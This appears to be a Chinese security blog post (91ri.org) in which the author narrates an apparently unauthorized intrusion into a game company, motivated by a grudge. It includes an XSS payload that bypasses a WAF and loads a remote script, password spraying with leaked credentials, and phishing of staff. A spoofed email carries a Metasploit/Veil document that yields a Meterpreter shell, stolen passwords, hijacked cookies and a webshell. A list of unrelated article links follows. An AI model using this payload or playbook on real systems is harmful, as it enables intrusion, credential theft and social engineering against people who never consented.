0×00背景

这是一次结合各自技巧的渗透过程,由于原作者的截图不多,我们只是简单叙述一下思路~

目标是一家本地的游戏公司,起因是找到一个反射型xss,但是却被对方公司忽略,而作者身边的一个妹子也在这家公司工作,便起了搞定这家公司的决心。

以下正片

=====================================================

0×01信息收集

目标公司:XX网络科技有限公司(XX游戏)

URL:http://www.xxxxcom.com

http://www.xxxxcom.cn(公司另一域名)

http://www.xxxxcom.cn.com(公司另一域名)

通过浏览主站和查询whois信息,得知其公司工作邮箱,域名所有人信息,HR联系方式等

结合社工库查询,综合得到目标公司一高管信息

工作邮箱直接查询到了密码,但是输入后提示密码错误,看来修改过,但仔细一看,均为有规律的弱口令

三个数字重复或者是键盘向下的方式组合的口令,于是我果断的决定根据这个规律碰撞一下其他密码试试

经过碰撞,把得到的密码丢到burpsuite重复提交到目标公司网站的登陆界面(本来想登录邮箱的,无奈网易有防止重复提交的策略)

跑了好一阵子,未果,碰撞密码,暂时搁浅

后来想起,whois信息中,域名是xinnet的,于是开心的去查询新网的裤子,不过查询结果很失望,密码依旧不对

至此第一次试探搁浅

0×02对目标网站的测试

目标站点进行cms指纹识别后反应是良精南方的,但是看了看用的是.net的 架构,想到去年和小伙伴领1w的原因就是因为发现该站点的漏洞,于是乎又折头看了看,shell已删除,并且管理后台重做过,去年是用的 admin.xxxxcom.com做的后台,现在看了看已经重做,只能放弃,不过好在菜刀还有缓存,通过缓存浏览了web目录下的大概情况,有个 bbs,一个前台,一个主站,均为.net架构,论坛更是Discuz!NT 3.6.711 出名的难日,浏览缓存后发现某目录下存在一富文本编辑器,访问后结果依旧不尽人意

果断放弃之,然后看了看去年找到的一个主站sql注入

装了新的安全狗,无力去继续绕过waf,放弃=。=

唔,那怎么办呢,接下来就对目标站点进行了FUZZ扫描,哟~好吧,就只扫到我之前说的那个xss,还是反射型的,不过突然想到目标公司的人说不就是个跨站么,这句话让我又不开心了起来,哥今天就拿这个屌丝反射型跨站逆袭给你看!

0×03反射型xss的逆袭之路(伪水坑攻击)

因为装了安全狗,所以要稍微进行攻击代码构造绕过一下

该反射构造的代码如下:

通过img标签构造iMg大小写的方式绕过,用onerror属性加 载,

1 onerror=eval(javascript:document.write(unescape(' <script src="http://xxx.js"></script>'));)

对eval操纵的内容进行16进制编码后测试通过

之后进行了第一次攻击尝试

找到客服反馈问题,我说你们游戏的注册页面有问题啊,没办法注册,注册的地址是不是这个啊(然后发了经过短域名处理的攻击url)

一般情况,客服都会来解决问题,但是该公司客服非常奇葩。。。说:哦,我也不知道啊,要不你下载个客户端去注册吧。

经过我机智的对话,仍然没有让其点击连接(给客服大爷您跪了)

第一次水坑攻击尝试失败。。暂时搁浅

91ri.org注:所谓“水坑攻击”,是指黑客通过分析被攻击者的网络活动规律,寻找被攻击者经常访问的网站的弱点,先攻下该网站并植入攻击代码,等待被攻击者来访时实施攻击。文中只是将xss发送到对方那边,等待对方点击,实际上是不能称为水坑攻击的,只能算钓鱼??

0×04第二次信息收集

首次尝试接连受挫,我过了几天在群里打屁,正好那个在这家公司上班的妹子也在,我就顺口问了问公司的情况

大概收集到信息为:

公司员工办公电脑均为win7,文字处理软件有office和wps但是默认使用的是office,公司并没有规定统一

不过好消息是office是默认的,以前看大牛们玩apt的时候都会很流弊的拿出office的漏洞通过邮件攻击搞定一切

做了个简易的接收端,探测公司那边的组件和杀毒软件

通过骗取点击后,接收端收到了session的信息,现在掌握的信息为:office版本为2007,浏览器为IE8,杀毒软件360,以及IP出口

0×05最后的冲锋,反射型xss终于逆袭

一切基本就绪,天随人愿的是我这里正好也有公网ip

但是有360略蛋疼,不过上次听maple说veil比较牛逼,我office用的payload自然是来自msf,那么就结合veil碰碰运气吧。。

找了个fake-email发伪造邮件

大概内容就是一篇求职的,附带了doc,doc里带了msf生成的

为了保险起见,除了附件有doc外,我还在邮件内容里加了经过短域名处理的xss攻击连接

邮件发过去了,一直开着msf等消息,不过貌似人家周日的时候不上班

吓的我一直开着电脑,第二天大概十点过,msf这边有动静了,好吧,可以返回Meterpreter会话了,总算是摸到了目标公司的设备(尽管只是一台个人电脑)

不过运气真不错,不知道是veil的原因免杀了360还是因为人品比较好当时对方360没有开,反正会话是反弹到了,快速的翻了翻对方的盘符,在文档里找到一份对应用户密码的记录,type了一下快速记录下来后把马删了撤退走人(91ri.org:把账号密码存在本机简直是硬伤啊)

好消息一个接着一个,之前在邮件内容中写入的短域名xss也被触发了,果断用其cookie登录,不过比较可惜,因为是反射型,对方后台找不到,只登录了前台

通过前台并没有进入后台的地方,但是论坛和前台互通,所以,嘿嘿~~是个超级版主

0×06尾声

之后的事情就不用说了,shell到手,对应用户密码也在个人电脑上扒拉到,呵呵~

最后我溜达了一圈,把shell删了,走人,只为证明反射型xss也是可以屌丝逆袭高富帅的!

写下这篇文章,默默抽根手边的花玉溪,深藏功与名

强调:自本文发出之前,目标服务器和对方电脑的木马均已删除,本人并未做任何破坏

来自:91ri.org

反射型XSS的逆袭之路的更多相关文章

  1. RestTemplate的逆袭之路,从发送请求到负载均衡

    上篇文章我们详细的介绍了RestTemplate发送请求的问题,熟悉Spring的小伙伴可能会发现:RestTemplate不就是Spring提供的一个发送请求的工具吗?它什么时候具有了实现客户端负载 ...

  2. 网管到CEO的10年逆袭之路

    把我个人近一年来讲的技术人员如何成长的鸡汤课整理了出来,送给大家<网管到CEO的10年逆袭之路>

  3. 从前端到全栈:JavaScript逆袭之路

    JavaScript如何做到上天入地无所不能?JavaScript真的能一统江湖吗? 背景 近年来,前端技术日新月异,前端已经不仅仅是网页,更多的开始由狭义向广义发展. 先后涌现出了具备后端能力的no ...

  4. 一个吊丝android个人开发者的逆袭之路

    转眼间,一年多过去了,记得我开发第一款android应用的时候,那是在前年的冬天,我本人是做java的,android的学习和开发完全是业余爱好,从前年上半年到前年下半年大约花了半年的业余时间把and ...

  5. 安卓触控一体机的逆袭之路_追逐品质_支持APP软件安卓

    显示性能参数 接口:RGB信号 分辨率:1024*600 比例16:9 显示尺寸(A.A.):222.72*(W)*125.28(H)mm 外围尺寸:235.0(W)*143.0(H)*4.5(T)m ...

  6. 程序人生|从网瘾少年到微软、BAT、字节offer收割机逆袭之路

    有情怀,有干货,微信搜索[三太子敖丙]关注这个不一样的程序员. 本文 GitHub https://github.com/JavaFamily 已收录,有一线大厂面试完整考点.资料以及我的系列文章. ...

  7. 从门外汉到腾讯Android高级研发——一个半路出家菜鸟的艰难逆袭之路

    我是在去年3月份加入腾讯公司,目前是腾讯公司某技术部门里面的一个小负责人,年薪月薪大税后概30K,谈不上多么厉害,但在回想自己半路出家学习编程,从一个销售到现在终于进入中国互联网顶尖公司,还是有些许感 ...

  8. python学习之路(一)屌丝逆袭之路

    变量                                                                                                  ...

  9. Airbnb创始人:屌丝的逆袭之路

    这位黑发小帅哥名叫Brian Chesky,是Airbnb的联合创始人. 如果在百度一下Airbnb,你就会看到如下事实:Airbnb,即Air Bed and Breakfast,中国名“空中食宿” ...

随机推荐

  1. jsp实现仿QQ空间新建多个相册名称,向相册中添加照片

    工具:Eclipse,Oracle,smartupload.jar:语言:jsp,Java:数据存储:Oracle. 实现功能介绍: 主要是新建相册,可以建多个相册,在相册中添加多张照片,删除照片,删 ...

  2. bzoj2560 串珠子

    Description 铭铭有n个十分漂亮的珠子和若干根颜色不同的绳子.现在铭铭想用绳子把所有的珠子连接成一个整体. 现在已知所有珠子互不相同,用整数1到n编号.对于第i个珠子和第j个珠子,可以选择不 ...

  3. 分布式键值存储系统ETCD调研

    分布式键值存储系统ETCD调研 简介 etcd是一个开源的分布式键值存储工具--为CoreOS集群提供配置服务.发现服务和协同调度.Etcd运行在集群的每个coreos节点上,可以保证coreos集群 ...

  4. 使用wcf编写坐标字符串生成shapefile文件,在iis发布供前端调用

    项目有一需求,需要由坐标字符串(格式:x,y,点名)生成shapefile,由于在前台开发类似功能比较麻烦而且也不适用,最终决定使用WCF来实现,不借助现有GIS软件,基于GDAL实现. 实现过程如下 ...

  5. 如何运行一个vue工程

    在师兄的推荐下入坑vue.js ,发现不知如何运行GitHub上的开源项目,很尴尬.通过查阅网上教程,成功搭建好项目环境,同时对前段工程化有了朦朦胧胧的认知,因此将环境搭建过程分享给大家.   首先, ...

  6. jenkins 使用注意

    在jenkins使用的时候,在输入文件地址的时候,文件各级目录不能有空格等特殊符号!否则报错!

  7. Linux下链接数据库图形化工具

    (一).Linux环境下mysql的安装.SQL操作 Linux下安装MySQL (rmp --help) 基本步骤:上传软件->检查当前Linux环境是否已经安装,如发现系统自带的,先卸载-& ...

  8. 项目自动构建工具对比(Maven、Gradle、Ant)

    Java世界中主要有三大构建工具:Ant.Maven和Gradle.经过几年的发展,Ant几乎销声匿迹.Maven也日薄西山,而Gradle的发展则如日中天. Maven的主要功能主要分为5点,分别是 ...

  9. IE6.0升级的两种通用代码

    随着W3C组织开始针对新的Web标准提案日期的到来,HTML5以及CSS3的新时代即将到来,同时微软的Win8以及IE10的出现也带给了这个世界奇妙的结构. 微软早在不再给WinXP做技术支持时,IE ...

  10. 【转】c++ new操作符的重载

    基本概念: 1. 操作符重载:C++支持对某个操作符赋予不同的语义 2. new操作符:申请内存,调用构造函数 关于c++ new操作符的重载 你知道c++ 的new 操作符和operator new ...